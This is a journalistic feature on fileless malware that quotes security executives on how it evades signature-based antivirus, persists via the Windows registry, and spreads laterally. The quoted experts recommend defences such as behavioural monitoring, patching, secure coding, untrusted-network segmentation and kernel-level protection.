File folders

How your security team can combat new fileless malware

public://pictures/John-Mello-Journalist.png
John P. Mello Jr., Freelance writer, Independent

Imagine malicious software that's almost invisible on your network's computers as it performs all sorts of damaging deeds. That's the threat system defenders face with fileless malware.

The malware is called fileless because it's designed to run entirely in memory and to cover most, if not all, signs of itself on a storage device. "This can take different forms, including malware that automatically removes its delivery package and runs solely in memory or that repurposes existing code like in-memory PowerShell commands," explained Peter Martini, co-founder and President of Iboss, a network behavior security monitoring company.

Like many attack techniques, fileless malware has a long history. "It's something that virus writers in the '90s did," noted Christopher Kruegel, co-founder and CEO of malware protection platform maker Lastline. "Their techniques are being rediscovered."

Although the malware is fileless when it's in memory, it still needs a file to set up shop on a system. It does that the same way most malware ends up on a machine: through a malicious attachment or compromised website. "It's a two-step process," Kruegel explained. "First you need to exploit the machine with shell code. Once the shell code is running, you download and execute the second stage, the payload that's the actual malware program."

With fileless malware, the payload isn't stored on disk. It's run directly in memory. "The benefit of that is there's no file on disk that an antivirus program can look at," Kruegel said.

Here's what your security team needs to know about invisible fileless malware—and how to defend against it.

State of Security Operations 2018: Go Inside World SOCs

Why it's difficult to detect

Many legacy antivirus solutions rely on existing malware signatures to detect and block malicious traffic. Fileless malware is designed to avoid that kind of detection. "The security community spends a lot of effort focusing on files," said Paul Ewing, a senior threat researcher at Endgame, an endpoint protection provider.

"It's looking at the analysis of a file or how a file executes to determine if it's malicious," he continued. "What the attackers have done is evolve. They've started using software found on a system that's already been vetted by security products."

For example, administrators have robust tools, such as PowerShell on Windows systems, that can be devastating to an organization's security if they come under the control of malicious actors. "My company blocks PowerShell," said Raef Meeuwisse, director for cybersecurity and data privacy governance at publisher Cyber Simplicity. "PowerShell commands can't be issued, so any malware attack that uses them can't be successful."

One drawback to living in memory is that life may be short. Memory is volatile. If a system is rebooted, everything in memory disappears, including an attacker's malware. That's bad news for most adversaries, because persistence is an important part of their threat plan. "In a true fileless attack, where there are no artifacts on disk, an attacker would not have any persistence," Ewing said.

However, most attackers try to address that contingency. One method they use on Windows machines is to hide a malicious script in the operating system's registry file. On a reboot, the script can be designed to load automatically and reload the hacker's malware into memory. "If the attacker wants to persist, that gives defenders an advantage because there are nuances in the registry we can use to find something malicious," Ewing explained.

In addition, malware writers aren't often content with infecting a single machine. "In order to persist, what a fileless malware attack usually does is try to find other vulnerable machines on the same network so it can propagate itself," said Meeuwisse, who is also external relations director at the London chapter of ISACA, an association for IT professionals with 140,000 members in 180 countries.   

The threat from fileless malware is growing

Fileless malware is a threat now, and it's expected to grow as existing tools are honed to improve the malicious software's evasiveness and new tools are developed. "It's definitely a growing trend," said Ewing. "I think we'll see more of it just because it seems like a natural response from the attackers. As we get better and better at detecting malicious files, then the evolution will be for hackers to use legitimate tools to their advantage."

What's more, the technique has almost become a necessity for adversaries targeting high-value targets. "Hackers know that the most valuable targets are generally well-protected and require the use of more advanced attack tools capable of avoiding detection and mitigation," Martini explained. "While some hackers will always focus on the low-hanging fruit, the more ambitious or skilled attackers will always be focused on developing more advanced tools like fileless malware."

That skill level, though, appears to be sinking. "Fileless malware is definitely more complex to develop than standard attack techniques," Martini said, "but as its use continues to increase and attack tools are publicized, they become much easier to deploy. Hackers are very adept at sharing information amongst each other, leading to easier and more efficient deployment methods spreading among the community rapidly."

Kruegel added, "The bar for creating fileless malware is getting lower, which is why we see it increasingly used by the bad guys."

Exploit kits are also lowering the barriers to entry into the fileless malware realm. When a hacking technique becomes fashionable, it starts to appear in exploit kits, which simplifies its adoption. "I think the level of skill required now is getting much lower because hackers can pick up commoditized, prepackaged pieces that they can start using in these attacks," Meeuwisse said.

[ Webinar: Get Started with Seamless App Sec in a Single Day (Jan. 23) ]

How your team can fight back against fileless

To defend against fileless malware attacks, organizations need to think beyond signature-based solutions. "They need to focus on tools that can identify malicious behavior on the network and implement proper cybersecurity hygiene like the timely patching of disclosed vulnerabilities and frequently revisit network isolation policies to ensure infected machines are identified and quarantined quickly," Martini said.

Developers, too, can contribute to defending against fileless malware attacks by building security into their applications from the beginning of the development lifecycle. "Too often, security is bolted on as afterthought," Martini explained. "There will always be bugs and vulnerabilities in software, but if security is top of mind throughout the development process, they can be minimized and identified before they're exploited by attackers."

Secure coding practices play an important role in foiling fileless malware because much of it requires an exploit to infect a machine. "Developers need to continue to make apps that are less likely to be exploited and contain as few vulnerabilities as possible," Ewing said.

Since fileless malware writers are looking for ways to compromise legitimate processes, services, and macros so they can operate without detection, developers need to lock those things down so they work only the way they're supposed to work. They also need to better understand how their programs work in memory. "If data used in a process is very sensitive, developers need to protect that data by encrypting it in memory or making sure it's written to a secure block of memory that's wiped after it's used," ISACA's Meeuwisse noted.

He added that security architects will also be addressing the problem. "We're going to see a marked decline in the use of trusted networks in organizations as they look to run environments that have improved capabilities to containerize threats," he said.

"If you've got 20 machines on a network and they all trust each other, then a malware attacker is going to find it a lot easier to get around and to cripple your organization than if you have an environment with 20 devices that don't trust each other at all, because an attack that affects one won't affect the other 19," he explained.     

There are new approaches coming

As fileless malware writers hone their tools, the security industry isn't sitting on its hands. There are some next-generation tools that show promise in combating fileless malware. Those tools depart from how the security industry is trying to address the problem now, which is to hook into processes in memory to determine if those processes are compromised. "Essentially, that's a hack," said Golan Ben-Oni, global chief information officer for IDT Corp.

"What the antivirus tools are doing is leveraging the same methods for prevention that attack tools leverage for destruction," he explained. "At some point, we have to take a step back and say, 'We shouldn't allow that.'"

Rather than hack processes in memory, next-generation antivirus products work directly with an operating system's kernel. "That's a much deeper approach to security,"  Ben-Oni said. "They can see an attempt to inject malicious code into processes and immediately isolate the problem."

"Ninety-nine percent of the antivirus industry has approached this problem from the user level," he added. "Working at the kernel level is far more powerful and effective."